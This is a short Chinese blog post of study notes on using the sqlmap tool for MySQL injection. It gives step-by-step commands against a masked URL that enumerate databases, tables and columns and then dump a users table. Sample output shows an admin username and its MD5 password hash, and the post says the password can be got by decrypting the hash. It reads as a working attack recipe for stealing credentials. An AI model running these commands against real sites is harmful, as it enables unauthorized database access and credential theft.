2.羽翼sqlmap学习笔记之MySQL注入
1.判断一个url是否存在注入点:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs
假设找到数据库:student
------------------------------ available databases[1] [*] student ------------------------------
2.获取数据库中的表名:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student --tables
假设找到表名:users
----------------------- [INFO] retrieved:users -----------------------
3.获取表中的字段名:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users --columns
假设获取出字段为:id username password
--------------------------------- [INFO] retrieved: id [INFO] retrieved: int(3) [INFO] retrieved: username [INFO] retrieved: varchar(30) [INFO] retrieved: password [INFO] retrieved: varchar(30) ----------------------------------
4.猜字段内容:
.sqlmap.py -u "http://abcd****efg.asp?id=7" -D student -T users -C id,username,password --dump
获取结果:
[INFO] retrieved: 1 [INFO] retrieved: admin [INFO] retrieved: 21232f297a57a5a743894a0e4a801fc3 (32位MD5加密密文)
账号:admin 密码:将密文解密即可。
*********************
交流即分享,分享才能进步!
不对之处,还请各位前辈多多指教。
by 星云
********************
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步